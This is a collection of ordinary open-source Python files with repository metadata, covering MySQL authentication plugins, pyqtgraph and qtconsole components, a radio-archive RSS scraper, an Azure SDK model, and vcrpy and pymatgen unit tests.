# <http://www.gnu.org/licenses/old-licenses/gpl-2.0.html>, like most
# MySQL Connectors. There are special exceptions to the terms and
# conditions of the GPLv2 as it is applied to this software, see the
# FOSS License Exception
# <http://www.mysql.com/about/legal/licensing/foss-exception.html>.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
"""Implementing support for MySQL Authentication Plugins"""
import struct
from hashlib import sha1
from . import errors
from .catch23 import PY2, isstr
class BaseAuthPlugin(object):
"""Base class for authentication plugins
Classes inheriting from BaseAuthPlugin should implement the method
prepare_password(). When instantiating, auth_data argument is
required. The username, password and database are optional. The
ssl_enabled argument can be used to tell the plugin whether SSL is
active or not.
The method auth_response() method is used to retrieve the password
which was prepared by prepare_password().
"""
requires_ssl = False
plugin_name = ''
def __init__(self, auth_data, username=None, password=None, database=None,
ssl_enabled=False):
"""Initialization"""
self._auth_data = auth_data
self._username = username
self._password = password
self._database = database
self._ssl_enabled = ssl_enabled
def prepare_password(self):
"""Prepares and returns password to be send to MySQL
This method needs to be implemented by classes inheriting from
this class. It is used by the auth_response() method.
Raises NotImplementedError.
"""
raise NotImplementedError
def auth_response(self):
"""Returns the prepared password to send to MySQL
Raises InterfaceError on errors. For example, when SSL is required
by not enabled.
Returns str
"""
if self.requires_ssl and not self._ssl_enabled:
raise errors.InterfaceError("{name} requires SSL".format(
name=self.plugin_name))
return self.prepare_password()
class MySQLNativePasswordAuthPlugin(BaseAuthPlugin):
"""Class implementing the MySQL Native Password authentication plugin"""
requires_ssl = False
plugin_name = 'mysql_native_password'
def prepare_password(self):
"""Prepares and returns password as native MySQL 4.1+ password"""
if not self._auth_data:
raise errors.InterfaceError("Missing authentication data (seed)")
if not self._password:
return b''
password = self._password
if isstr(self._password):
password = self._password.encode('utf-8')
else:
password = self._password
if PY2:
password = buffer(password) # pylint: disable=E0602
try:
auth_data = buffer(self._auth_data) # pylint: disable=E0602
except TypeError:
raise errors.InterfaceError("Authentication data incorrect")
else:
password = password
auth_data = self._auth_data
hash4 = None
try:
hash1 = sha1(password).digest()
hash2 = sha1(hash1).digest()
hash3 = sha1(auth_data + hash2).digest()
if PY2:
xored = [ord(h1) ^ ord(h3) for (h1, h3) in zip(hash1, hash3)]
else:
xored = [h1 ^ h3 for (h1, h3) in zip(hash1, hash3)]
hash4 = struct.pack('20B', *xored)
except Exception as exc:
raise errors.InterfaceError(
"Failed scrambling password; {0}".format(exc))
return hash4
class MySQLClearPasswordAuthPlugin(BaseAuthPlugin):
"""Class implementing the MySQL Clear Password authentication plugin"""
requires_ssl = True
plugin_name = 'mysql_clear_password'
def prepare_password(self):
"""Returns password as as clear text"""
if not self._password:
return b'\x00'
password = self._password
if PY2:
if isinstance(password, unicode): # pylint: disable=E0602
password = password.encode('utf8')
elif isinstance(password, str):
password = password.encode('utf8')
return password + b'\x00'
class MySQLSHA256PasswordAuthPlugin(BaseAuthPlugin):
"""Class implementing the MySQL SHA256 authentication plugin
Note that encrypting using RSA is not supported since the Python
Standard Library does not provide this OpenSSL functionality.
"""
requires_ssl = True
plugin_name = 'sha256_password'
def prepare_password(self):
"""Returns password as as clear text"""
if not self._password:
return b'\x00'
password = self._password
if PY2:
if isinstance(password, unicode): # pylint: disable=E0602
password = password.encode('utf8')
elif isinstance(password, str):
password = password.encode('utf8')
return password + b'\x00'
def get_auth_plugin(plugin_name):
"""Return authentication class based on plugin name
This function returns the class for the authentication plugin plugin_name.
The returned class is a subclass of BaseAuthPlugin.
Raises errors.NotSupportedError when plugin_name is not supported.
Returns subclass of BaseAuthPlugin.
"""
for authclass in BaseAuthPlugin.__subclasses__(): # pylint: disable=E1101
if authclass.plugin_name == plugin_name:
return authclass
raise errors.NotSupportedError(
"Authentication plugin '{0}' is not supported".format(plugin_name))
|
LuciferJack/python-mysql-pool
|
PyMysqlPool/mysql/connector/authentication.py
|
Python
|
mit
| 6,479
|
from ..Qt import QtGui, QtCore, QtWidgets
from ..GraphicsScene import GraphicsScene
from .GraphicsItem import GraphicsItem
__all__ = ['GraphicsWidget']
class GraphicsWidget(GraphicsItem, QtWidgets.QGraphicsWidget):
_qtBaseClass = QtWidgets.QGraphicsWidget
def __init__(self, *args, **kargs):
"""
**Bases:** :class:`GraphicsItem <pyqtgraph.GraphicsItem>`, :class:`QtGui.QGraphicsWidget`
Extends QGraphicsWidget with several helpful methods and workarounds for PyQt bugs.
Most of the extra functionality is inherited from :class:`GraphicsItem <pyqtgraph.GraphicsItem>`.
"""
QtWidgets.QGraphicsWidget.__init__(self, *args, **kargs)
GraphicsItem.__init__(self)
## done by GraphicsItem init
#GraphicsScene.registerObject(self) ## workaround for pyqt bug in graphicsscene.items()
# Removed due to https://bugreports.qt-project.org/browse/PYSIDE-86
#def itemChange(self, change, value):
## BEWARE: Calling QGraphicsWidget.itemChange can lead to crashing!
##ret = QtGui.QGraphicsWidget.itemChange(self, change, value) ## segv occurs here
## The default behavior is just to return the value argument, so we'll do that
## without calling the original method.
#ret = value
#if change in [self.ItemParentHasChanged, self.ItemSceneHasChanged]:
#self._updateView()
#return ret
def setFixedHeight(self, h):
self.setMaximumHeight(h)
self.setMinimumHeight(h)
def setFixedWidth(self, h):
self.setMaximumWidth(h)
self.setMinimumWidth(h)
def height(self):
return self.geometry().height()
def width(self):
return self.geometry().width()
def boundingRect(self):
br = self.mapRectFromParent(self.geometry()).normalized()
#print "bounds:", br
return br
def shape(self): ## No idea why this is necessary, but rotated items do not receive clicks otherwise.
p = QtGui.QPainterPath()
p.addRect(self.boundingRect())
#print "shape:", p.boundingRect()
return p
|
mylxiaoyi/mypyqtgraph-qt5
|
pyqtgraph/graphicsItems/GraphicsWidget.py
|
Python
|
mit
| 2,172
|
# -*- coding: utf-8 -*-
"""
traceview.discovery
This module contains the objects associated with Discovery API resources.
http://dev.appneta.com/docs/api-v2/discovery.html
"""
from .resource import Resource
class Action(Resource):
def get(self):
return self.api.get('actions')
class Browser(Resource):
def get(self):
return self.api.get('browsers')
class Controller(Resource):
def get(self):
return self.api.get('controllers')
class Domain(Resource):
def get(self):
return self.api.get('domains')
class Layer(Resource):
def get(self, app, *args, **kwargs):
path = 'layers/{app}'.format(app=app)
return self.api.get(path, *args, **kwargs)
class Metric(Resource):
def get(self):
return self.api.get('metrics')
class Region(Resource):
def get(self):
return self.api.get('regions')
|
danriti/python-traceview
|
traceview/discovery.py
|
Python
|
mit
| 896
|
# pylint: disable=missing-docstring,blacklisted-name,invalid-name,not-callable
dependency = None
foo = None
bar = None
def do_work_using_import_module():
dependency.foo()
dependency.bar()
def do_work_using_from_import():
foo()
bar()
|
whyzdev/impject
|
tpkg/production_no_import.py
|
Python
|
mit
| 253
|
"""
Based on
https://github.com/jupyter/notebook/blob/master/notebook/static/services/kernels/comm.js
https://github.com/ipython/ipykernel/blob/master/ipykernel/comm/manager.py
https://github.com/ipython/ipykernel/blob/master/ipykernel/comm/comm.py
Which are distributed under the terms of the Modified BSD License.
"""
import logging
from traitlets.config import LoggingConfigurable
from ipython_genutils.importstring import import_item
from ipython_genutils.py3compat import string_types
import uuid
from qtpy import QtCore
from qtconsole.util import MetaQObjectHasTraits, SuperQObject
class CommManager(MetaQObjectHasTraits(
'NewBase', (LoggingConfigurable, SuperQObject), {})):
"""
Manager for Comms in the Frontend
"""
def __init__(self, kernel_client, *args, **kwargs):
super(CommManager, self).__init__(*args, **kwargs)
self.comms = {}
self.targets = {}
if kernel_client:
self.init_kernel_client(kernel_client)
def init_kernel_client(self, kernel_client):
"""
connect the kernel, and register message handlers
"""
self.kernel_client = kernel_client
kernel_client.iopub_channel.message_received.connect(self._dispatch)
@QtCore.Slot(object)
def _dispatch(self, msg):
"""Dispatch messages"""
msg_type = msg['header']['msg_type']
handled_msg_types = ['comm_open', 'comm_msg', 'comm_close']
if msg_type in handled_msg_types:
getattr(self, msg_type)(msg)
def new_comm(self, target_name, data=None, metadata=None,
comm_id=None, buffers=None):
"""
Create a new Comm, register it, and open its Kernel-side counterpart
Mimics the auto-registration in `Comm.__init__` in the Jupyter Comm.
argument comm_id is optional
"""
comm = Comm(target_name, self.kernel_client, comm_id)
self.register_comm(comm)
try:
comm.open(data, metadata, buffers)
except Exception:
self.unregister_comm(comm)
raise
return comm
def register_target(self, target_name, f):
"""Register a callable f for a given target name
f will be called with two arguments when a comm_open message is
received with `target`:
- the Comm instance
- the `comm_open` message itself.
f can be a Python callable or an import string for one.
"""
if isinstance(f, string_types):
f = import_item(f)
self.targets[target_name] = f
def unregister_target(self, target_name, f):
"""Unregister a callable registered with register_target"""
return self.targets.pop(target_name)
def register_comm(self, comm):
"""Register a new comm"""
comm_id = comm.comm_id
comm.kernel_client = self.kernel_client
self.comms[comm_id] = comm
comm.sig_is_closing.connect(self.unregister_comm)
return comm_id
@QtCore.Slot(object)
def unregister_comm(self, comm):
"""Unregister a comm, and close its counterpart."""
# unlike get_comm, this should raise a KeyError
comm.sig_is_closing.disconnect(self.unregister_comm)
self.comms.pop(comm.comm_id)
def get_comm(self, comm_id, closing=False):
"""Get a comm with a particular id
Returns the comm if found, otherwise None.
This will not raise an error,
it will log messages if the comm cannot be found.
If the comm is closing, it might already have closed,
so this is ignored.
"""
try:
return self.comms[comm_id]
except KeyError:
if closing:
return
self.log.warning("No such comm: %s", comm_id)
# don't create the list of keys if debug messages aren't enabled
if self.log.isEnabledFor(logging.DEBUG):
self.log.debug("Current comms: %s", list(self.comms.keys()))
# comm message handlers
def comm_open(self, msg):
"""Handler for comm_open messages"""
content = msg['content']
comm_id = content['comm_id']
target_name = content['target_name']
f = self.targets.get(target_name, None)
comm = Comm(target_name, self.kernel_client, comm_id)
self.register_comm(comm)
if f is None:
self.log.error("No such comm target registered: %s", target_name)
else:
try:
f(comm, msg)
return
except Exception:
self.log.error("Exception opening comm with target: %s",
target_name, exc_info=True)
# Failure.
try:
comm.close()
except Exception:
self.log.error(
"Could not close comm during `comm_open` failure "
"clean-up. The comm may not have been opened yet.""",
exc_info=True)
def comm_close(self, msg):
"""Handler for comm_close messages"""
content = msg['content']
comm_id = content['comm_id']
comm = self.get_comm(comm_id, closing=True)
if comm is None:
return
self.unregister_comm(comm)
try:
comm.handle_close(msg)
except Exception:
self.log.error('Exception in comm_close for %s', comm_id,
exc_info=True)
def comm_msg(self, msg):
"""Handler for comm_msg messages"""
content = msg['content']
comm_id = content['comm_id']
comm = self.get_comm(comm_id)
if comm is None:
return
try:
comm.handle_msg(msg)
except Exception:
self.log.error('Exception in comm_msg for %s', comm_id,
exc_info=True)
class Comm(MetaQObjectHasTraits(
'NewBase', (LoggingConfigurable, SuperQObject), {})):
"""
Comm base class
"""
sig_is_closing = QtCore.Signal(object)
def __init__(self, target_name, kernel_client, comm_id=None,
msg_callback=None, close_callback=None):
"""
Create a new comm. Must call open to use.
"""
super(Comm, self).__init__(target_name=target_name)
self.target_name = target_name
self.kernel_client = kernel_client
if comm_id is None:
comm_id = uuid.uuid1().hex
self.comm_id = comm_id
self._msg_callback = msg_callback
self._close_callback = close_callback
self._send_channel = self.kernel_client.shell_channel
def _send_msg(self, msg_type, content, data, metadata, buffers):
"""
Send a message on the shell channel.
"""
if data is None:
data = {}
if content is None:
content = {}
content['comm_id'] = self.comm_id
content['data'] = data
msg = self.kernel_client.session.msg(
msg_type, content, metadata=metadata)
if buffers:
msg['buffers'] = buffers
return self._send_channel.send(msg)
# methods for sending messages
def open(self, data=None, metadata=None, buffers=None):
"""Open the kernel-side version of this comm"""
return self._send_msg(
'comm_open', {'target_name': self.target_name},
data, metadata, buffers)
def send(self, data=None, metadata=None, buffers=None):
"""Send a message to the kernel-side version of this comm"""
return self._send_msg(
'comm_msg', {}, data, metadata, buffers)
def close(self, data=None, metadata=None, buffers=None):
"""Close the kernel-side version of this comm"""
self.sig_is_closing.emit(self)
return self._send_msg(
'comm_close', {}, data, metadata, buffers)
# methods for registering callbacks for incoming messages
def on_msg(self, callback):
"""Register a callback for comm_msg
Will be called with the `data` of any comm_msg messages.
Call `on_msg(None)` to disable an existing callback.
"""
self._msg_callback = callback
def on_close(self, callback):
"""Register a callback for comm_close
Will be called with the `data` of the close message.
Call `on_close(None)` to disable an existing callback.
"""
self._close_callback = callback
# methods for handling incoming messages
def handle_msg(self, msg):
"""Handle a comm_msg message"""
self.log.debug("handle_msg[%s](%s)", self.comm_id, msg)
if self._msg_callback:
return self._msg_callback(msg)
def handle_close(self, msg):
"""Handle a comm_close message"""
self.log.debug("handle_close[%s](%s)", self.comm_id, msg)
if self._close_callback:
return self._close_callback(msg)
__all__ = ['CommManager']
|
sserrot/champion_relationships
|
venv/Lib/site-packages/qtconsole/comms.py
|
Python
|
mit
| 8,976
|
# coding=utf-8
import datetime
import logging
import re
from lxml import etree
from lxml import html
import requests
import requests.utils
import ziniurrss.cache
import ziniurrss.feed
import ziniurrss.parallel
log = logging.getLogger(__name__)
def get_remote_content(url):
log.debug('Getting [%s].' % url)
user_agent = requests.utils.default_user_agent('ziniurrss.herokuapp.com')
return requests.get(url, headers={'User-Agent': user_agent}).text
def parse_show_list():
page = get_shows_page()
tree = html.fromstring(page)
options = tree.xpath('//select[@id="show_id"]/option')
shows = {}
for option in options[1:]:
show_id = option.xpath('@value')[0]
show_name = option.xpath('text()')[0]
shows[show_id] = show_name
return shows
def get_shows_page():
url = 'http://www.ziniuradijas.lt/archyvas/laidu-irasai'
return get_remote_content(url)
def get_show_page(show_id=29006, page_no=1):
# the friendly show name in url is irrelevant
url = 'http://www.ziniuradijas.lt/laida/_/%s?page=%s' % (str(show_id), str(page_no))
return get_remote_content(url)
def parse_show_info(page):
tree = html.fromstring(page)
show_title = tree.xpath('//a[@class="show-title"]/text()')[0]
friendly_show_url = 'http://www.ziniuradijas.lt' + tree.xpath('//a[@class="show-title"]/@href')[0]
desc = tree.xpath('//div[@class="description"]')[0].text_content()
desc = desc.strip()
# desc = re.sub(r"^\s+$", "", desc)
desc = re.sub(r"\n+", "\n", desc)
images = tree.xpath('//div[@class="top-show"]/img/@src')
image = images[0] if images else None
return {
'title': show_title,
'url': friendly_show_url,
'image': image,
'description': desc,
}
def parse_page_count(page):
tree = html.fromstring(page)
# 2 'pagination' components in a page
pages = len(tree.xpath('//div[@class="pagination"]//a')) / 2
if pages == 0:
return 1
else:
return pages
def get_episode_page(url):
return get_remote_content(url)
def parse_date(link):
if '?' in link:
ts = int(link[str(link).index('?') + 1:])
return datetime.datetime.utcfromtimestamp(ts).strftime('%Y-%m-%d %H:%M:%S')
else:
return None
def parse_episode(episode_html, use_cache=False):
episode_html = html.fromstring(episode_html)
show_link = 'http://www.ziniuradijas.lt' + episode_html.xpath('div/a/@href')[0]
description = episode_html.xpath('div[2]/div/p/text()')[0] if episode_html.xpath('div[2]/div/p/text()') else ""
page = get_cached_episode_page(show_link, use_cache)
links = parse_links(page)
if not links:
log.debug("No media link for [%s], skipping." % show_link)
return None
show_date = parse_date(links[-1]) # TODO: handle all medial link times
if not show_date:
show_date = episode_html.xpath('p[@class="date"]/text()')[0]
episode = {
'date': show_date,
'description': description,
'show_link': show_link,
'media_links': links,
}
return episode
def parse_episodes(page, limit=0, use_cache=False):
tree = html.fromstring(page)
episodes = []
episodes_dom = tree.xpath('//div[@class="new"]')
for episode_dom in episodes_dom:
episode = parse_episode(etree.tostring(episode_dom), use_cache)
if not episode:
continue
episodes.append(episode)
if len(episodes) == limit and limit != 0:
log.debug("Reached limit=%s, breaking." % limit)
break
return episodes
def parse_links(page):
tree = html.fromstring(page)
media_links = tree.xpath('//a[@class="download"]/@href')
if media_links:
result = []
for x in media_links:
result.append(x)
return result
else:
return None
def get_all(show_id, limit=0, use_cache=True, threads=1):
page = get_cached_show_page(show_id, 1, use_cache)
show_info = parse_show_info(page)
pages = parse_page_count(page)
episodes = []
for page_no in range(1, pages + 1):
if page is not 1:
page = get_cached_show_page(show_id, page_no, use_cache)
if threads > 1:
log.warn("Using experimental parallel version with %s threads." % threads)
if limit:
episodes += ziniurrss.parallel.parse_episodes_parallel_limited(page, limit=limit - len(episodes),
use_cache=use_cache, threads=threads)
else:
log.debug("Using unlimited parallel retrieval.")
episodes += ziniurrss.parallel.parse_episodes_parallel(page, use_cache=use_cache, threads=threads)
else:
episodes += parse_episodes(page, limit=limit - len(episodes), use_cache=use_cache)
if limit is not 0 and len(episodes) >= limit:
episodes = episodes[:limit]
break
return show_info, episodes
def get_cached_show_page(show_id, page_no=1, use_cache=False):
retrieval_function = lambda: get_show_page(show_id, page_no)
if use_cache:
filename = '/ziniurrss_show_%s_%s' % (show_id, page_no)
return ziniurrss.cache.get_cached_page(filename, retrieval_function)
else:
return retrieval_function()
def get_cached_episode_page(link, use_cache=False):
retrieval_function = lambda: get_episode_page(link)
if use_cache:
filename = '/ziniurrss_episode_%s' % (hash(link)) # TODO: better include episode id in filename
return ziniurrss.cache.get_cached_page(filename, retrieval_function)
else:
return retrieval_function()
def main():
(show_info, episodes) = get_all(show_id=29006, limit=2)
print(ziniurrss.feed.get_feed_as_string(show_info, episodes))
if __name__ == '__main__':
logging.basicConfig(
datefmt='%H:%M:%S',
format='%(asctime)s %(levelname)8s [%(name)s] - %(message)s - (File "%(pathname)s", line %(lineno)d)',
level=logging.DEBUG
)
main()
|
tori3852/ziniurrss
|
src/ziniurrss/main.py
|
Python
|
mit
| 6,120
|
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from msrest.serialization import Model
class GroupGetMemberGroupsParameters(Model):
"""Request parameters for GetMemberGroups API call.
All required parameters must be populated in order to send to Azure.
:param additional_properties: Unmatched properties from the message are
deserialized this collection
:type additional_properties: dict[str, object]
:param security_enabled_only: Required. If true, only membership in
security-enabled groups should be checked. Otherwise, membership in all
groups should be checked.
:type security_enabled_only: bool
"""
_validation = {
'security_enabled_only': {'required': True},
}
_attribute_map = {
'additional_properties': {'key': '', 'type': '{object}'},
'security_enabled_only': {'key': 'securityEnabledOnly', 'type': 'bool'},
}
def __init__(self, *, security_enabled_only: bool, additional_properties=None, **kwargs) -> None:
super(GroupGetMemberGroupsParameters, self).__init__(**kwargs)
self.additional_properties = additional_properties
self.security_enabled_only = security_enabled_only
|
Azure/azure-sdk-for-python
|
sdk/graphrbac/azure-graphrbac/azure/graphrbac/models/group_get_member_groups_parameters_py3.py
|
Python
|
mit
| 1,627
|
import pytest
import vcr
from six.moves.urllib.request import urlopen
def test_making_extra_request_raises_exception(tmpdir, httpbin):
# make two requests in the first request that are considered
# identical (since the match is based on method)
with vcr.use_cassette(str(tmpdir.join("test.json")), match_on=["method"]):
urlopen(httpbin.url + "/status/200")
urlopen(httpbin.url + "/status/201")
# Now, try to make three requests. The first two should return the
# correct status codes in order, and the third should raise an
# exception.
with vcr.use_cassette(str(tmpdir.join("test.json")), match_on=["method"]):
assert urlopen(httpbin.url + "/status/200").getcode() == 200
assert urlopen(httpbin.url + "/status/201").getcode() == 201
with pytest.raises(Exception):
urlopen(httpbin.url + "/status/200")
|
Azure/azure-sdk-for-python
|
tools/vcrpy/tests/integration/test_multiple.py
|
Python
|
mit
| 886
|
# Copyright (c) Pymatgen Development Team.
# Distributed under the terms of the MIT License.
import os
import unittest
from monty.serialization import dumpfn, loadfn
from pymatgen.core.structure import Molecule
from pymatgen.io.qchem.outputs import QCOutput, check_for_structure_changes
from pymatgen.util.testing import PymatgenTest
try:
from openbabel import openbabel
openbabel # reference openbabel so it's not unused import
have_babel = True
except ImportError:
have_babel = False
__author__ = "Samuel Blau, Brandon Wood, Shyam Dwaraknath, Evan Spotte-Smith"
__copyright__ = "Copyright 2018, The Materials Project"
__version__ = "0.1"
single_job_dict = loadfn(os.path.join(os.path.dirname(__file__), "single_job.json"))
multi_job_dict = loadfn(os.path.join(os.path.dirname(__file__), "multi_job.json"))
property_list = {
"errors",
"multiple_outputs",
"completion",
"unrestricted",
"using_GEN_SCFMAN",
"final_energy",
"S2",
"optimization",
"energy_trajectory",
"opt_constraint",
"frequency_job",
"charge",
"multiplicity",
"species",
"initial_geometry",
"initial_molecule",
"SCF",
"Mulliken",
"optimized_geometry",
"optimized_zmat",
"molecule_from_optimized_geometry",
"last_geometry",
"molecule_from_last_geometry",
"geometries",
"gradients",
"frequency_mode_vectors",
"walltime",
"cputime",
"point_group",
"frequencies",
"IR_intens",
"IR_active",
"g_electrostatic",
"g_cavitation",
"g_dispersion",
"g_repulsion",
"total_contribution_pcm",
"ZPE",
"trans_enthalpy",
"vib_enthalpy",
"rot_enthalpy",
"gas_constant",
"trans_entropy",
"vib_entropy",
"rot_entropy",
"total_entropy",
"total_enthalpy",
"warnings",
"SCF_energy_in_the_final_basis_set",
"Total_energy_in_the_final_basis_set",
"solvent_method",
"solvent_data",
"using_dft_d3",
"single_point_job",
"force_job",
"pcm_gradients",
"CDS_gradients",
"RESP",
"trans_dip",
"transition_state",
"scan_job",
"optimized_geometries",
"molecules_from_optimized_geometries",
"scan_energies",
"scan_constraint_sets",
"hf_scf_energy",
"mp2_energy",
"ccsd_correlation_energy",
"ccsd_total_energy",
"ccsd(t)_correlation_energy",
"ccsd(t)_total_energy",
}
if have_babel:
property_list.add("structure_change")
single_job_out_names = {
"unable_to_determine_lambda_in_geom_opt.qcout",
"thiophene_wfs_5_carboxyl.qcout",
"hf.qcout",
"hf_opt_failed.qcout",
"no_reading.qcout",
"exit_code_134.qcout",
"negative_eigen.qcout",
"insufficient_memory.qcout",
"freq_seg_too_small.qcout",
"crowd_gradient_number.qcout",
"quinoxaline_anion.qcout",
"tfsi_nbo.qcout",
"crowd_nbo_charges.qcout",
"h2o_aimd.qcout",
"quinoxaline_anion.qcout",
"crowd_gradient_number.qcout",
"bsse.qcout",
"thiophene_wfs_5_carboxyl.qcout",
"time_nan_values.qcout",
"pt_dft_180.0.qcout",
"qchem_energies/hf-rimp2.qcout",
"qchem_energies/hf_b3lyp.qcout",
"qchem_energies/hf_ccsd(t).qcout",
"qchem_energies/hf_cosmo.qcout",
"qchem_energies/hf_hf.qcout",
"qchem_energies/hf_lxygjos.qcout",
"qchem_energies/hf_mosmp2.qcout",
"qchem_energies/hf_mp2.qcout",
"qchem_energies/hf_qcisd(t).qcout",
"qchem_energies/hf_riccsd(t).qcout",
"qchem_energies/hf_tpssh.qcout",
"qchem_energies/hf_xyg3.qcout",
"qchem_energies/hf_xygjos.qcout",
"qchem_energies/hf_wb97xd_gen_scfman.qcout",
"new_qchem_files/pt_n2_n_wb_180.0.qcout",
"new_qchem_files/pt_n2_trip_wb_90.0.qcout",
"new_qchem_files/pt_n2_gs_rimp2_pvqz_90.0.qcout",
"new_qchem_files/VC_solv_eps10.2.qcout",
"crazy_scf_values.qcout",
"new_qchem_files/N2.qcout",
"new_qchem_files/julian.qcout.gz",
"new_qchem_files/Frequency_no_equal.qout",
"new_qchem_files/gdm.qout",
"new_qchem_files/DinfH.qout",
"new_qchem_files/mpi_error.qout",
"new_qchem_files/molecule_read_error.qout",
"new_qchem_files/basis_not_supported.qout",
"new_qchem_files/lebdevpts.qout",
"new_qchem_files/Optimization_no_equal.qout",
"new_qchem_files/2068.qout",
"new_qchem_files/2620.qout",
"new_qchem_files/1746.qout",
"new_qchem_files/1570.qout",
"new_qchem_files/1570_2.qout",
"new_qchem_files/single_point.qout",
"new_qchem_files/roothaan_diis_gdm.qout",
"new_qchem_files/pes_scan_single_variable.qout",
"new_qchem_files/pes_scan_double_variable.qout",
"new_qchem_files/ts.out",
"new_qchem_files/ccsd.qout",
"new_qchem_files/ccsdt.qout",
}
multi_job_out_names = {
"not_enough_total_memory.qcout",
"new_qchem_files/VC_solv_eps10.qcout",
"new_qchem_files/MECLi_solv_eps10.qcout",
"pcm_solvent_deprecated.qcout",
"qchem43_batch_job.qcout",
"ferrocenium_1pos.qcout",
"CdBr2.qcout",
"killed.qcout",
"aux_mpi_time_mol.qcout",
"new_qchem_files/VCLi_solv_eps10.qcout",
}
class TestQCOutput(PymatgenTest):
@staticmethod
def generate_single_job_dict():
"""
Used to generate test dictionary for single jobs.
"""
single_job_dict = {}
for file in single_job_out_names:
single_job_dict[file] = QCOutput(os.path.join(PymatgenTest.TEST_FILES_DIR, "molecules", file)).data
dumpfn(single_job_dict, "single_job.json")
@staticmethod
def generate_multi_job_dict():
"""
Used to generate test dictionary for multiple jobs.
"""
multi_job_dict = {}
for file in multi_job_out_names:
outputs = QCOutput.multiple_outputs_from_file(
QCOutput, os.path.join(PymatgenTest.TEST_FILES_DIR, "molecules", file), keep_sub_files=False
)
data = []
for sub_output in outputs:
data.append(sub_output.data)
multi_job_dict[file] = data
dumpfn(multi_job_dict, "multi_job.json")
def _test_property(self, key, single_outs, multi_outs):
for name, outdata in single_outs.items():
try:
self.assertEqual(outdata.get(key), single_job_dict[name].get(key))
except ValueError:
self.assertArrayEqual(outdata.get(key), single_job_dict[name].get(key))
for name, outputs in multi_outs.items():
for ii, sub_output in enumerate(outputs):
try:
self.assertEqual(sub_output.data.get(key), multi_job_dict[name][ii].get(key))
except ValueError:
self.assertArrayEqual(sub_output.data.get(key), multi_job_dict[name][ii].get(key))
def test_all(self):
self.maxDiff = None
single_outs = {}
for file in single_job_out_names:
single_outs[file] = QCOutput(os.path.join(PymatgenTest.TEST_FILES_DIR, "molecules", file)).data
multi_outs = {}
for file in multi_job_out_names:
multi_outs[file] = QCOutput.multiple_outputs_from_file(
QCOutput, os.path.join(PymatgenTest.TEST_FILES_DIR, "molecules", file), keep_sub_files=False
)
for key in property_list:
print("Testing ", key)
self._test_property(key, single_outs, multi_outs)
@unittest.skipIf((not (have_babel)), "OpenBabel not installed.")
def test_structural_change(self):
t1 = Molecule.from_file(os.path.join(PymatgenTest.TEST_FILES_DIR, "molecules", "structural_change", "t1.xyz"))
t2 = Molecule.from_file(os.path.join(PymatgenTest.TEST_FILES_DIR, "molecules", "structural_change", "t2.xyz"))
t3 = Molecule.from_file(os.path.join(PymatgenTest.TEST_FILES_DIR, "molecules", "structural_change", "t3.xyz"))
thio_1 = Molecule.from_file(
os.path.join(PymatgenTest.TEST_FILES_DIR, "molecules", "structural_change", "thiophene1.xyz")
)
thio_2 = Molecule.from_file(
os.path.join(PymatgenTest.TEST_FILES_DIR, "molecules", "structural_change", "thiophene2.xyz")
)
frag_1 = Molecule.from_file(
os.path.join(
PymatgenTest.TEST_FILES_DIR, "molecules", "new_qchem_files", "test_structure_change", "frag_1.xyz"
)
)
frag_2 = Molecule.from_file(
os.path.join(
PymatgenTest.TEST_FILES_DIR, "molecules", "new_qchem_files", "test_structure_change", "frag_2.xyz"
)
)
self.assertEqual(check_for_structure_changes(t1, t1), "no_change")
self.assertEqual(check_for_structure_changes(t2, t3), "no_change")
self.assertEqual(check_for_structure_changes(t1, t2), "fewer_bonds")
self.assertEqual(check_for_structure_changes(t2, t1), "more_bonds")
self.assertEqual(check_for_structure_changes(thio_1, thio_2), "unconnected_fragments")
self.assertEqual(check_for_structure_changes(frag_1, frag_2), "bond_change")
def test_NBO_parsing(self):
data = QCOutput(os.path.join(PymatgenTest.TEST_FILES_DIR, "molecules", "new_qchem_files", "nbo.qout")).data
self.assertEqual(len(data["nbo_data"]["natural_populations"]), 3)
self.assertEqual(len(data["nbo_data"]["hybridization_character"]), 4)
self.assertEqual(len(data["nbo_data"]["perturbation_energy"]), 2)
self.assertEqual(data["nbo_data"]["natural_populations"][0]["Density"][5], -0.08624)
self.assertEqual(data["nbo_data"]["hybridization_character"][-1]["atom 2 pol coeff"][35], "-0.7059")
next_to_last = list(data["nbo_data"]["perturbation_energy"][-1]["fock matrix element"].keys())[-2]
self.assertEqual(data["nbo_data"]["perturbation_energy"][-1]["fock matrix element"][next_to_last], 0.071)
self.assertEqual(data["nbo_data"]["perturbation_energy"][0]["acceptor type"][0], "RY*")
def test_NBO7_parsing(self):
data = QCOutput(os.path.join(PymatgenTest.TEST_FILES_DIR, "molecules", "new_qchem_files", "nbo7_1.qout")).data
self.assertEqual(data["nbo_data"]["perturbation_energy"][0]["perturbation energy"][9], 15.73)
self.assertEqual(len(data["nbo_data"]["perturbation_energy"][0]["donor bond index"].keys()), 84)
self.assertEqual(len(data["nbo_data"]["perturbation_energy"][1]["donor bond index"].keys()), 29)
data = QCOutput(os.path.join(PymatgenTest.TEST_FILES_DIR, "molecules", "new_qchem_files", "nbo7_2.qout")).data
self.assertEqual(data["nbo_data"]["perturbation_energy"][0]["perturbation energy"][13], 32.93)
self.assertEqual(data["nbo_data"]["perturbation_energy"][0]["acceptor type"][13], "LV")
self.assertEqual(data["nbo_data"]["perturbation_energy"][0]["acceptor type"][12], "RY")
self.assertEqual(data["nbo_data"]["perturbation_energy"][0]["acceptor atom 1 symbol"][12], "Mg")
data = QCOutput(os.path.join(PymatgenTest.TEST_FILES_DIR, "molecules", "new_qchem_files", "nbo7_3.qout")).data
self.assertEqual(data["nbo_data"]["perturbation_energy"][0]["perturbation energy"][13], 34.54)
self.assertEqual(data["nbo_data"]["perturbation_energy"][0]["acceptor type"][13], "BD*")
self.assertEqual(data["nbo_data"]["perturbation_energy"][0]["acceptor atom 1 symbol"][13], "B")
